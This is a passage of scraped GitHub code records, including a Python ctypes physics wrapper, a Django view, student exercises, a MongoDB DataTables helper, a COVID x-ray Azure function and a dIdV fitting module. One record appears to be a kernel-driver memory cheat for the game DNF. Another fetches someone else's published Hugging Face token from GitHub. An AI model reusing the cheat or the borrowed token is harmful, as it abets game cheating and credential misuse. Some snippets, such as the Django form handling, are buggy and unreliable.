ctypes.c_void_p(None)\n\n self._attached_objects = []\n\n def _attach_object(self, obj):\n \"\"\"\n Store a reference to obj.\n\n This is a crude approach for making sure that arbitrary objects have \n lifetimes that are at least as long as that of self\n \"\"\"\n if obj not in self._attached_objects:\n self._attached_objects.append(obj)\n\n def append(self,statistic_name_ptr, arg_struct_ptr = None):\n assert (self.length + 1) <= self.capacity\n new_ind = self.length\n self.length+=1\n\n if isinstance(statistic_name_ptr, ctypes.Array):\n self._attach_object(statistic_name_ptr) # extra safety\n self._data[new_ind].statistic = ctypes.cast(statistic_name_ptr,\n ctypes.c_char_p)\n else:\n self._data[new_ind].statistic = statistic_name_ptr\n\n if arg_struct_ptr is None:\n self._data[new_ind].arg_ptr = ctypes.c_void_p(None)\n else:\n self._data[new_ind].arg_ptr = arg_struct_ptr\n\n def __len__(self):\n return self.length\n\n def get_STATLISTITEM_ptr(self):\n return ctypes.cast(self._data, _STATLISTITEM_ptr)\n\n def __str__(self):\n elements = []\n for i in range(self.length):\n elements.append('{' + str(self._data[i].statistic) + ',' +\n str(self._data[i].arg_ptr) + '}')\n return '[' + ','.join(elements) + ']'\n\nclass HISTBINS(ctypes.Structure):\n _fields_ = [(\"bin_edges\", _double_ptr),\n (\"n_bins\", ctypes.c_size_t)]\n\n @staticmethod\n def construct(bin_edges, arg_name = None):\n bin_edges = np.asarray(bin_edges, dtype = np.float64, order = 'C')\n assert _verify_bin_edges(bin_edges)\n n_bins = int(bin_edges.size - 1)\n\n return HISTBINS(bin_edges = bin_edges.ctypes.data_as(_double_ptr),\n n_bins = n_bins)\n_HISTBINS_ptr = ctypes.POINTER(HISTBINS)\n\nclass PARALLELSPEC(ctypes.Structure):\n _fields_ = [(\"nproc\", ctypes.c_size_t),\n (\"force_sequential\", ctypes.c_bool)]\n\n_ptr_to_double_ptr = ctypes.POINTER(_double_ptr)\n\n# define the argument types\n_lib.calc_vsf_props.argtypes = [\n POINTPROPS, POINTPROPS,\n _STATLISTITEM_ptr, ctypes.c_size_t,\n np.ctypeslib.ndpointer(dtype = np.float64, ndim = 1,\n flags = 'C_CONTIGUOUS'),\n ctypes.c_size_t,\n PARALLELSPEC,\n np.ctypeslib.ndpointer(dtype = np.float64, ndim = 1,\n flags = ['C_CONTIGUOUS', 'WRITEABLE']),\n np.ctypeslib.ndpointer(dtype = np.int64, ndim = 1,\n flags = ['C_CONTIGUOUS', 'WRITEABLE'])\n]\n_lib.calc_vsf_props.restype = ctypes.c_bool\n\n\nclass VSFPropsRsltContainer:\n def __init__(self, int64_quans, float64_quans):\n duplicates = set(int64_quans.keys()).intersection(float64_quans.keys())\n assert len(duplicates) == 0\n\n def _parse_input_dict(input_dict):\n total_length = 0\n access_dict = {}\n for key, subarr_shape in input_dict.items():\n subarr_size = np.prod(subarr_shape)\n subarr_idx = slice(total_length, total_length + subarr_size)\n access_dict[key] = (subarr_idx, subarr_shape)\n total_length += subarr_size\n return access_dict, total_length\n\n self.int64_access_dict, int64_len = _parse_input_dict(int64_quans)\n self.float64_access_dict, float64_len = _parse_input_dict(float64_quans)\n\n self.int64_arr = np.empty((int64_len,), dtype = np.int64 )\n self.float64_arr = np.empty((float64_len,), dtype = np.float64)\n\n @staticmethod\n def _get(key, access_dict, arr):\n idx, out_shape = access_dict[key]\n out = arr[idx]\n out.shape = out_shape # ensures we don't make a copy\n return out\n\n def __getitem__(self,key):\n try:\n return self._get(key, self.float64_access_dict, self.float64_arr)\n except KeyError:\n try:\n return self._get(key, self.int64_access_dict, self.int64_arr)\n except KeyError:\n raise KeyError(key) from None\n\n def extract_statistic_dict(self, statistic_name):\n out = {}\n\n def _extract(access_dict, arr):\n for (stat,quan), v in access_dict.items():\n if stat == statistic_name:\n out[quan] = self._get((stat,quan), access_dict, arr)\n\n _extract(self.int64_access_dict, self.int64_arr )\n _extract(self.float64_access_dict, self.float64_arr)\n\n if len(out) == 0:\n raise ValueError(f\"there's no statistic called '{statistic_name}'\")\n return out\n\n def get_flt_vals_arr(self):\n return self.float64_arr\n\n def get_i64_vals_arr(self):\n return self.int64_arr\n\ndef _process_statistic_args(stat_kw_pairs, dist_bin_edges):\n \"\"\"\n Construct the appropriate instance of StatList as well as information about\n the output data\n \"\"\"\n\n # it's important that we retain order!\n int64_quans = OrderedDict()\n float64_quans = OrderedDict()\n\n stat_list = StatList()\n\n # it's important that we consider the entries of stat_kw_pairs in\n # alphabetical order of the statistic names so that the stat_list entries\n # are also initialized in alphabetical order\n for stat_name, stat_kw in sorted(stat_kw_pairs, key = lambda pair: pair[0]):\n # load kernel object, which stores metadata\n kernel = get_kernel(stat_name)\n if kernel.non_vsf_func is not None:\n raise ValueError(f\"'{stat_name}' can't be computed by vsf_props\")\n\n # first, look at quantities associated with stat_name\n prop_l = kernel.get_dset_props(dist_bin_edges, kwargs = stat_kw)\n for quan_name, dtype, shape in prop_l:\n key = (stat_name, quan_name)\n assert (key not in int64_quans) and (key not in float64_quans)\n if dtype == np.int64:\n int64_quans[key] = shape\n elif dtype == np.float64:\n float64_quans[key] = shape\n else:\n raise ValueError(f\"can't handle datatype: {dtype}\")\n\n # now, appropriately update StatList\n # kernel.get_dset_props would have raised an error if stat_kw had the\n # wrong size\n c_stat_name_buffer = ctypes.create_string_buffer(stat_name.encode())\n # attach c_stat_name_buffer to stat_list so it isn't garbage collected\n # during stat_list's lifetime\n stat_list._attach_object(c_stat_name_buffer)\n\n if len(stat_kw) == 0:\n stat_list.append(statistic_name_ptr = c_stat_name_buffer,\n arg_struct_ptr = None)\n elif stat_name == 'histogram':\n assert list(stat_kw) == ['val_bin_edges']\n val_bin_edges = np.asanyarray(stat_kw['val_bin_edges'],\n dtype = np.float64)\n if not _verify_bin_edges(val_bin_edges):\n raise ValueError(\n 'kwargs[\"val_bin_edges\"] must be a 1D monotonically '\n 'increasing array with 2 or more values'\n )\n val_bins_struct = HISTBINS.construct(val_bin_edges)\n val_bins_ptr = _HISTBINS_ptr(val_bins_struct)\n\n accum_arg_ptr = ctypes.cast(val_bins_ptr, ctypes.c_void_p)\n stat_list.append(statistic_name_ptr = c_stat_name_buffer,\n arg_struct_ptr = accum_arg_ptr)\n stat_list._attach_object(val_bins_struct)\n else:\n raise RuntimeError(f\"There's no support for adding '{stat_name}' \"\n \"to stat_list\")\n\n return stat_list, VSFPropsRsltContainer(int64_quans = int64_quans,\n float64_quans = float64_quans)\n\ndef _validate_stat_kw_pairs(arg):\n if not isinstance(arg, Sequence):\n raise ValueError(\"stat_kw_pairs must be a sequence\")\n for elem in arg:\n if len(elem) != 2:\n raise ValueError(\"Each element in stat_kw_pairs must hold 2\"\n \"elements\")\n first, second = elem\n if (not isinstance(first, str)) or (not isinstance(second, dict)):\n raise ValueError(\"Each element in stat_kw_pairs must hold a \"\n \"string paired with a dict\")\n\ndef vsf_props(pos_a, pos_b, vel_a, vel_b, dist_bin_edges,\n stat_kw_pairs = [('variance', {})],\n nproc = 1, force_sequential = False,\n postprocess_stat = True):\n \"\"\"\n Calculates properties pertaining to the velocity structure function for \n pairs of points.\n\n If you set both ``pos_b`` and ``vel_b`` to ``None`` then the velocity \n structure properties will only be computed for unique pairs of the points\n specified by ``pos_a`` and ``vel_a``\n\n Parameters\n ----------\n pos_a, pos_b : array_like\n 2D arrays holding the positions of each point. Axis 0 should be the \n number of spatial dimensions must be consistent for each array. Axis 1\n can be different for each array\n vel_a, vel_b : array_like\n 2D arrays holding the velocities at each point. The shape of ``vel_a`` \n should match ``pos_a`` and the shape of ``vel_b`` should match\n ``pos_b``.\n dist_bin_edges : array_like\n 1D array of monotonically increasing values that represent edges for \n distance bins. A distance ``x`` lies in bin ``i`` if it lies in the \n interval ``dist_bin_edges[i] <= x < dist_bin_edges[i+1]``.\n stat_kw_pairs : sequence of (str, dict) tuples\n Each entry is a tuple holding the name of a statistic to compute and a\n dictionary of kwargs needed to compute that statistic. A list of valid\n statistics are described below. Unless we explicitly state otherwise,\n an empty dict should be passed for the kwargs.\n nproc : int, optional\n Number of processes to use for parallelizing this calculation. Default\n is 1. If the problem is small enough, the program may ignore this\n argument and use fewer processes.\n force_sequential : bool, optional\n `False` by default. When `True`, this forces the code to run with a\n single process (regardless of the value of `nproc`). However, the data\n is still partitioned as though it were using `nproc` processes. Thus,\n floating point results should be bitwise identical to an identical\n function call where this is `False`. (This is primarily provided for\n debugging purposes)\n postprocess_stat : bool, optional\n Users directly employing this function should almost always set this\n kwarg to `True` (the default). This option is only provided to simplify\n the process of consolidating results from multiple calls to vsf_props.\n\n Notes\n -----\n Currently recognized statistic names include:\n - 'mean': calculate the 1st order VSF.\n - 'variance': calculate the 1st and 2nd order VSFs\n - 'histogram': this constructs a 2D histogram. The bin edges along axis\n 0 are given by the `dist_bin_edges` argument. The magnitudes of the \n velocity differences are binned along axis 1. The 'val_bin_edges'\n keyword must be specified alongside this statistic. It should be\n associated with a 1D monotonic array that specifies the bin edges\n along axis 1.\n \"\"\"\n _validate_stat_kw_pairs(stat_kw_pairs)\n\n points_a = POINTPROPS.construct(pos_a, vel_a, dtype = np.float64,\n allow_null_pair = False)\n points_b = POINTPROPS.construct(pos_b, vel_b, dtype = np.float64,\n allow_null_pair = True)\n\n if pos_b is None:\n assert points_a.n_points > 1\n else:\n assert points_a.n_spatial_dims == points_b.n_spatial_dims\n\n if points_a.n_spatial_dims != 3:\n raise NotImplementedError(\n \"vsf_props currently only has support for computing velocity \"\n \"structure function properties for sets of points with 3 spatial \"\n \"dimensions\"\n )\n\n dist_bin_edges = np.asanyarray(dist_bin_edges, dtype = np.float64)\n if not _verify_bin_edges(dist_bin_edges):\n raise ValueError(\n 'dist_bin_edges must be a 1D monotonically increasing array with '\n '2 or more values'\n )\n ndist_bins = dist_bin_edges.size - 1\n\n stat_list, rslt_container = _process_statistic_args(stat_kw_pairs,\n dist_bin_edges)\n\n parallel_spec = PARALLELSPEC(nproc = nproc,\n force_sequential = force_sequential)\n\n # now actually call the function\n success = _lib.calc_vsf_props(\n points_a, points_b,\n stat_list.get_STATLISTITEM_ptr(), len(stat_list),\n dist_bin_edges, ndist_bins,\n parallel_spec,\n rslt_container.get_flt_vals_arr(),\n rslt_container.get_i64_vals_arr()\n )\n\n assert success\n\n out = []\n for stat_name, _ in stat_kw_pairs:\n val_dict = rslt_container.extract_statistic_dict(stat_name)\n\n if postprocess_stat:\n kernel = get_kernel(stat_name)\n kernel.postprocess_rslt(val_dict)\n out.append(val_dict)\n\n return out\n","repo_name":"mabruzzo/pyvsf","sub_path":"pyvsf/pyvsf.py","file_name":"pyvsf.py","file_ext":"py","file_size_in_byte":16412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9483534585","text":"from django.shortcuts import render\nfrom station.forms import StationForm \nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework.decorators import api_view\nfrom station.models import Station\n\n@api_view(['GET', 'POST'])\ndef station(request):\n \n if request.method == \"POST\":\n form = StationForm(request.data)\n form.is_valid()\n form = StationForm(request.data)\n #breakpoint()\n if form.is_valid:\n try: \n form.save()\n return redirect('/show') \n except: \n pass\n else: \n form = StationForm() \n return render(request,'index.html',{'form':form}) \n \ndef data(request): \n station = Station.objects.order_by('-id') \n return render(request,\"data.html\",{'station':station}) \n \ndef datashow(request):\n station = Station.objects.last()\n return render(request,\"datashow.html\",{'station':station}) ","repo_name":"Blifi/Station","sub_path":"station/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33822406985","text":"###Titulo: Reescrever função\n###Função: Este programa foi reescrito para adicionar uma mariável\n###Autor: Valmor Mantelli Jr.\n###Data: 24/11/20148\n###Versão: 0.0.1\n\n# Entrada dos dados\nsalário = 750\naumento = 0.15\n\nNovosalário = (salário * aumento) + salário\n\n#Saída de dados\nprint(Novosalário)\n","repo_name":"profnssorg/valmorMantelli1","sub_path":"exer206.py","file_name":"exer206.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19007280525","text":"\n#ETHAN ISAACS\n\nimport re\ndef split_line(line):\n return re.findall('[A-Za-z]+(?:\\'[A-Za-z]+)?', line)\ndictionary_words = []\nfile = open('../Notes/data/dictionary.txt', 'r')\nfor line in file:\n line = line.strip()\n dictionary_words.append(line)\ndef linear_search(key, dictionary):\n i = 0\n while i < len(dictionary) and dictionary[i] != key:\n i += 1\n if i < len(dictionary):\n return(False)\n else:\n return(True)\ndef binary_search(key, dictionary):\n lower_bound = 0\n upper_bound = len(dictionary) - 1\n found = False\n while lower_bound <= upper_bound and not found:\n middle_pos = (lower_bound + upper_bound) // 2\n if dictionary[middle_pos] < key:\n lower_bound = middle_pos + 1\n elif dictionary[middle_pos] > key:\n upper_bound = middle_pos - 1\n else:\n found = True\n if found:\n return(False)\n else:\n return(True)\nprint(\"Binary Search YAY\")\nalice_linefun = []\nalice_chapter1 = open('../Notes/data/AliceInWonderland200.txt', 'r')\nfor line in alice_chapter1:\n words = split_line(line.strip())\n alice_linefun.append(words)\nfor i in range(len(alice_linefun)):\n for word in alice_linefun[i]:\n found = binary_search(word.upper(), dictionary_words)\n if found:\n print(\"Line\", i, \"this word could be wrong bro!: \", word)\nprint(\"Linear Search YAY\")\nalice_fun = []\nalice_chapter1 = open('../Notes/data/AliceInWonderland200.txt', 'r')\nfor line in alice_chapter1:\n words = split_line(line.strip())\n alice_fun.append(words)\nfor i in range (len(alice_fun)):\n for word in alice_fun[i]:\n found = linear_search(word.upper(), dictionary_words)\n if found:\n print(\"Line\", i, \"this word could be wrong bro!: \", word)\n\nprint(\"Lewis Carroll fix these please\")\n\n","repo_name":"eisaacs21/Programming2_SP19","sub_path":"Searching/SPELL CHECK.py","file_name":"SPELL CHECK.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"41192426072","text":"from PIL import Image\n\n# Pillow is deprecating the top-level resampling attributes (e.g., Image.BILINEAR) in\n# favor of the Image.Resampling enum. The top-level resampling attributes will be\n# removed in Pillow 10.\nif hasattr(Image, \"Resampling\"):\n _pil_interpolation_to_str = {\n Image.Resampling.NEAREST: \"nearest\",\n Image.Resampling.BILINEAR: \"bilinear\",\n Image.Resampling.BICUBIC: \"bicubic\",\n Image.Resampling.BOX: \"box\",\n Image.Resampling.HAMMING: \"hamming\",\n Image.Resampling.LANCZOS: \"lanczos\",\n }\nelse:\n _pil_interpolation_to_str = {\n Image.NEAREST: \"nearest\",\n Image.BILINEAR: \"bilinear\",\n Image.BICUBIC: \"bicubic\",\n Image.BOX: \"box\",\n Image.HAMMING: \"hamming\",\n Image.LANCZOS: \"lanczos\",\n }\n\n_str_to_pil_interpolation = {b: a for a, b in _pil_interpolation_to_str.items()}\n\n\nclass PIL_IMAGE_RESAMPLING:\n NEAREST = _str_to_pil_interpolation[\"nearest\"]\n BILINEAR = _str_to_pil_interpolation[\"bilinear\"]\n BICUBIC = _str_to_pil_interpolation[\"bicubic\"]\n BOX = _str_to_pil_interpolation[\"box\"]\n HAMMING = _str_to_pil_interpolation[\"hamming\"]\n LANCZOS = _str_to_pil_interpolation[\"lanczos\"]\n\n\ndef fetch_bytes(url_or_path):\n if str(url_or_path).startswith(\"http://\") or str(url_or_path).startswith(\n \"https://\"\n ):\n from urllib.request import urlopen\n\n return urlopen(url_or_path)\n return open(url_or_path, \"r\")\n\n\ndef fetch_huggingface_key():\n \"\"\"Fetch some huggingface token.\n Extracted from some colab notebook\n \"\"\"\n try:\n with fetch_bytes(\n \"https://raw.githubusercontent.com/WASasquatch/easydiffusion/main/key.txt\"\n ) as f:\n key = f.read().decode(\"utf-8\").split(\":\")\n except OSError as e:\n print(e)\n huggingface_username = key[0].strip()\n huggingface_token = key[1].strip()\n return huggingface_token\n","repo_name":"victor-estrade/play_with_stable_diffusion","sub_path":"stable_diffusion/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18608283456","text":"import pandas as pd \r\nimport numpy as np\r\nwine = pd.read_csv(r\"C:\\Users\\ANKIT\\Desktop\\Aradhana\\PCA\\wine.csv\")\r\nwine.describe()\r\nwine.head(10)\r\n\r\nfrom sklearn.decomposition import PCA\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.preprocessing import scale \r\n\r\n# Considering only numerical data \r\nwine.head(4)\r\n\r\n# Normalizing the numerical data \r\nwine_normal = scale(wine)\r\n\r\npca = PCA(n_components = 13)\r\npca_values = pca.fit_transform(wine_normal)\r\n\r\n\r\n# The amount of variance that each PCA explains is \r\nvar = pca.explained_variance_ratio_\r\nvar\r\npca.components_[0]\r\n\r\n# Cumulative variance \r\n\r\nvar1 = np.cumsum(np.round(var,decimals = 4)*100)\r\nvar1\r\n\r\n# Variance plot for PCA components obtained \r\nplt.plot(var1,color=\"red\")\r\n\r\n# plot between PCA1 and PCA2 \r\nx = pca_values[:,0]\r\ny = pca_values[:,1]\r\nz = pca_values[:2:3]\r\ncolor =np.random.rand(178)\r\n\r\nplt.scatter(x,y,color=[\"red\"])\r\nplt.show()\r\n\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nAxes3D.scatter(np.array(x),np.array(y),np.array(z),c=[\"green\",\"blue\",\"red\"])\r\n\r\n\r\n################### Clustering ##########################\r\nnew_df = pd.DataFrame(pca_values[:,0:4])\r\n\r\nfrom sklearn.cluster import KMeans\r\n\r\nkmeans = KMeans(n_clusters = 3)\r\nkmeans.fit(new_df)\r\nkmeans.labels_\r\n","repo_name":"Aradhana318/code","sub_path":"PCA.py","file_name":"PCA.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"773970953","text":"from common import helper, globle, logger\nfrom driver import init_driver\nfrom game import mem, init\n\nif __name__ == '__main__':\n try:\n globle.cmd = \"cmd\"\n init_driver()\n logger.info(\"驱动加载成功\", 1)\n process_id = helper.get_process_id_by_name(\"DNF.exe\")\n if process_id == 0:\n helper.message_box(\"请打开dnf后运行\")\n exit()\n\n mem.set_process_id(process_id)\n init.init_empty_addr()\n logger.info(\"加载成功-欢迎使用\", 1)\n logger.info(\"当前时间:{}\".format(helper.get_now_date()), 1)\n init.hotkey2()\n except KeyboardInterrupt as e:\n pass\n except Exception as err:\n import sys\n import traceback\n\n except_type, _, except_traceback = sys.exc_info()\n print(except_type)\n print(err.args)\n print(except_traceback)\n print('-----------')\n for i in traceback.extract_tb(except_traceback):\n print(i)\n","repo_name":"xiaoyelj/DnfHelper-Python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"74424627361","text":"import logging\nimport warnings\n\nimport azure.functions as func\nimport cv2\nimport numpy as np\nimport requests\nimport tflite_runtime.interpreter as tflite\n\nwarnings.filterwarnings(\"ignore\")\n\nmodel = tflite.Interpreter(model_path=\"mlcovid/model/model.tflite\")\nURL = (\n \"https://raw.githubusercontent.com/lyoh001/AzureStaticWebApps/main/mlcovid/images/\"\n)\n\nnormal = [1, 2, 4, 7, 8, 10, 13, 16, 19, 20, 22, 25, 28]\ncovid = [3, 6, 9, 12, 15, 18, 21, 24, 27, 30]\npneumonia = [5, 11, 14, 17, 23, 26, 29]\n\n\ndef predict_image(image_id):\n try:\n preprocessed_image = (\n np.array(\n cv2.imdecode(\n np.asarray(\n bytearray(requests.get(f\"{URL}{image_id}.jpg\").content),\n dtype=np.uint8,\n ),\n -1,\n )\n ).reshape(1, 224, 224, -1)\n / 255.0\n )\n except ConnectionError as e:\n return func.HttpResponse(\n status_code=400,\n body=f\"Connection Error: {e}\",\n )\n model.allocate_tensors()\n input_index = model.get_input_details()[0][\"index\"]\n input_tensor = preprocessed_image.astype(\"float32\")\n output_details = model.get_output_details()\n model.set_tensor(input_index, input_tensor)\n model.invoke()\n prediction = [\"Normal\", \"Covid\", \"Pneumonia\"][\n np.argmax(model.get_tensor(output_details[0][\"index\"])[0])\n ]\n return prediction\n\n\ndef main(req: func.HttpRequest) -> func.HttpResponse:\n logging.info(\"*******Starting main function*******\")\n logging.info(f\"Request query: {req.get_json()}\")\n payload = {\n k: [np.nan] if next(iter(v)) == \"\" else v for k, v in req.get_json().items()\n }\n try:\n image_id = int(next(iter(payload[\"image_id\"])))\n if not 1 <= image_id <= 30:\n return func.HttpResponse(\n status_code=200,\n body=\"Invalid input, please use a number between 1 and 30.\",\n )\n except ValueError:\n return func.HttpResponse(\n status_code=200,\n body=\"Invalid input, please use a number between 1 and 30.\",\n )\n\n actual = (\n \"Normal\"\n if image_id in normal\n else \"Covid\"\n if image_id in covid\n else \"Pneumonia\"\n )\n prediction = predict_image(image_id)\n logging.info(f\"Actual: {actual} | Prediction: {prediction}\")\n logging.info(\n f\"The AI predicts that the patient in the x-ray image is {'not infected with any disease' if prediction == 'Normal' else f'infected with {prediction}'}. Please note that the accuracy of the model will depend on the quality of the x-ray image and the size of the training dataset. If you are concerned about the accuracy of the prediction, you should consult with a medical professional.\"\n )\n\n return func.HttpResponse(\n status_code=200,\n body=f\"The AI predicts that the patient in the x-ray image is {'not infected with any disease' if prediction == 'Normal' else f'infected with {prediction}'}. Please note that the accuracy of the model will depend on the quality of the x-ray image and the size of the training dataset. If you are concerned about the accuracy of the prediction, you should consult with a medical professional.\",\n )\n","repo_name":"lyoh001/AzureFunctions","sub_path":"mlcovid/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22000435327","text":"\"\"\"Connect DataTables server side to a MongoDB database.\n\nSupports column sorting and filtering by search terms. Also supports custom filtering in case you want to manipulate\nthe search server side, for example send a value like days_til_expiration=60 and convert to Mongo search like\n{'ExpiryDate': {'$gt': ts, '$lt': ds}} where ts is today's date like 2017-09-12 and ds is today's date plus 60 days.\n\"\"\"\nimport json\nfrom bson.objectid import ObjectId\n\n\nclass DataTables(object):\n def __init__(self, pymongo_object, collection, request_args, **custom_filter):\n \"\"\"\n\n :param pymongo_object: The PyMongo object representing the connection to a Mongo instance.\n :param collection: The Mongo collection\n :param request_args: The args from DataTables, passed as Flask request.values.get('args')\n :param custom_filter: kwargs to be used as a custom Mongo filter, like key=value\n \"\"\"\n\n self.mongo = pymongo_object\n self.collection = collection\n self.request_args = request_args\n self.custom_filter = custom_filter\n\n @property\n def db(self):\n return self.mongo.db\n\n @property\n def search_terms(self):\n return str(self.request_args.get(\"search\")[\"value\"]).split()\n\n @property\n def search_terms_without_a_colon(self):\n return [term for term in self.search_terms if \":\" not in term]\n\n @property\n def search_terms_with_a_colon(self):\n return [term for term in self.search_terms if term.count(\":\") == 1]\n\n @property\n def dt_column_search(self):\n \"\"\"\n Adds support for datatables own column search functionality.\n\n documented here: https://datatables.net/manual/server-side\n\n :return:\n \"\"\"\n return [{\n \"column\": column['data'],\n \"value\": column['search']['value'],\n \"regex\": column['search']['regex']\n } for column in self.request_args.get(\"columns\") if column['search'][\"value\"] != \"\"]\n\n @property\n def requested_columns(self):\n return [column[\"data\"] for column in self.request_args.get(\"columns\")]\n\n @property\n def draw(self):\n return self.request_args.get(\"draw\")\n\n @property\n def start(self):\n return self.request_args.get(\"start\")\n\n @property\n def limit(self):\n _length = self.request_args.get(\"length\")\n if _length == -1:\n return None\n return _length\n\n @property\n def cardinality(self):\n return self.db[self.collection].count()\n\n @property\n def cardinality_filtered(self):\n return self.db[self.collection].find(self.filter).count()\n\n @property\n def order_dir(self):\n \"\"\"\n Return '1' for 'asc' or '-1' for 'desc'\n :return:\n \"\"\"\n _dir = self.request_args.get(\"order\")[0][\"dir\"]\n _MONGO_ORDER = {'asc': 1, 'desc': -1}\n return _MONGO_ORDER[_dir]\n\n @property\n def order_column(self):\n \"\"\"DataTables provides the index of the order column, but Mongo .sort wants its name.\n\n :return:\n \"\"\"\n _order_col = self.request_args.get(\"order\")[0][\"column\"]\n return self.requested_columns[_order_col]\n\n @property\n def projection(self):\n p = {}\n for key in self.requested_columns:\n p.update({key: {'$ifNull': ['$' + key, '']}})\n return p\n\n def search_specific_key(self):\n \"\"\"Search specific keys (columns) like 'key:value'.\n\n :return:\n \"\"\"\n _col_specific_search = {}\n\n for column_search in self.dt_column_search:\n col = column_search['column']\n term = column_search['value']\n\n if column_search.get(\"regex\", False) is True:\n _col_specific_search.update({col: {'$regex': term, '$options': 'i'}})\n else:\n _col_specific_search.update({col: term})\n\n # Putting the global search variant last, should overwrite all DT-searches\n for term in self.search_terms_with_a_colon:\n col, term = term.split(':')\n _col_specific_search.update({col: {'$regex': term, '$options': 'i'}})\n\n return _col_specific_search\n\n def search_query(self):\n \"\"\"Build the MongoDB query, searching every column for every term (case insensitive regex).\n\n :return:\n \"\"\"\n # D3\n _search_query = {}\n if self.search_terms_without_a_colon:\n # L2\n and_filter_on_all_terms = []\n for term in self.search_terms_without_a_colon:\n # D2\n or_filter = {}\n # L1\n or_filter_on_all_columns = []\n for column in self.requested_columns:\n # D1\n column_filter = {\n column: {'$regex': term, '$options': 'i'}\n }\n or_filter_on_all_columns.append(column_filter)\n or_filter['$or'] = or_filter_on_all_columns\n and_filter_on_all_terms.append(or_filter)\n\n _search_query['$and'] = and_filter_on_all_terms\n\n return _search_query\n\n @property\n def filter(self):\n _filter = {}\n _filter.update(self.custom_filter)\n _filter.update(self.search_query())\n _filter.update(self.search_specific_key())\n return _filter\n\n def results(self):\n\n _agg = [\n {'$match': self.filter},\n {'$sort': {self.order_column: self.order_dir}},\n {'$skip': self.start},\n {'$project': self.projection}\n ]\n\n if self.limit:\n _agg.append({'$limit': self.limit})\n\n _results = list(self.db[self.collection].aggregate(_agg))\n\n processed_results = []\n for result in _results:\n result = dict(result)\n result[\"DT_RowId\"] = str(result.pop('_id')) # rename the _id and convert ObjectId to str\n\n # go through every val in result and try to json.dumps objects and arrays - skip this if strings are okay\n for key, val in result.items():\n if type(val) in [list, dict, float]:\n result[key] = json.dumps(val)\n\n processed_results.append(result)\n\n return processed_results\n\n def get_rows(self):\n return {\n 'recordsTotal': str(self.cardinality),\n 'recordsFiltered': str(self.cardinality_filtered),\n 'draw': int(str(self.draw)), # cast draw as integer to prevent XSS\n 'data': self.results()\n }\n","repo_name":"pjosols/mongo-datatables","sub_path":"mongo_datatables/datatables.py","file_name":"datatables.py","file_ext":"py","file_size_in_byte":6571,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"54"} +{"seq_id":"11357692492","text":"# coding=utf-8\n\"\"\"Pytest customizations and fixtures for the quipucords tests.\"\"\"\n\nimport pytest\n\nfrom camayoc import utils\nfrom camayoc.config import get_config\n\n\ndef pytest_collection_modifyitems(\n session: pytest.Session, items: list[pytest.Item], config: pytest.Config\n) -> None:\n for clear_all_idx, node in enumerate(items):\n if node.nodeid.endswith(\"test_credentials.py::test_clear_all\"):\n break\n clear_all_node = items.pop(clear_all_idx)\n items.insert(0, clear_all_node)\n\n\n@pytest.fixture\ndef isolated_filesystem(request):\n \"\"\"Fixture that creates a temporary directory.\n\n Changes the current working directory to the created temporary directory\n for isolated filesystem tests.\n \"\"\"\n # Create isolated filesystem directory in the ssh_keyfile_path\n # configuration location if marked with `ssh_keyfile_path`.\n mark = request.node.get_closest_marker(\"ssh_keyfile_path\")\n ssh_keyfile_path = None\n if mark:\n cfg = get_config().get(\"qpc\", {})\n ssh_keyfile_path = cfg.get(\"ssh_keyfile_path\")\n if not ssh_keyfile_path:\n pytest.fail(\"QPC configuration 'ssh_keyfile_path' not provided or \" \"found\")\n with utils.isolated_filesystem(ssh_keyfile_path) as path:\n yield path\n","repo_name":"quipucords/camayoc","sub_path":"camayoc/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"40531277743","text":"import numpy as np\nfrom scipy.optimize import least_squares, fsolve\nfrom scipy.fftpack import fft, ifft, fftfreq\n\nfrom ._base_didv import _BaseDIDV, complexadmittance, get_i0, get_ibias, get_tes_bias_parameters_dict, get_tes_bias_parameters_dict_infinite_loop_gain\nfrom ._plot_didv import _PlotDIDV\nfrom ._uncertainties_didv import get_power_noise_with_uncertainties, get_dPdI_with_uncertainties\nfrom ._uncertainties_didv import get_smallsignalparams_cov, get_smallsignalparams_sigmas\n\n\n\n__all__ = [\n \"didvinitfromdata\",\n \"DIDV\",\n]\n\n\ndef didvinitfromdata(tmean, didvmean, didvstd, offset, offset_err, fs, sgfreq,\n sgamp, rsh, r0=0.3, rp=0.005, dutycycle=0.5,\n add180phase=False, dt0=1.5e-6):\n \"\"\"\n Function to initialize and process a dIdV dataset without having\n all of the traces, but just the parameters that are required for\n fitting. After running, this returns a DIDV class object that is\n ready for fitting.\n\n Parameters\n ----------\n tmean : ndarray\n The average trace in time domain, units of Amps\n didvstd : ndarray\n The complex standard deviation of the didv in frequency space\n for each frequency\n didvmean : ndarray\n The average trace converted to didv\n offset : float\n The offset (i.e. baseline value) of the didv trace, in Amps\n offset_err : float\n The error in the offset of the didv trace, in Amps\n fs : float\n Sample rate of the data taken, in Hz\n sgfreq : float\n Frequency of the signal generator, in Hz\n sgamp : float\n Peak-to-peak size of the square wave supplied by the signal\n generator, in Amps (equivalent to jitter in the QET bias)\n rsh : float\n Shunt 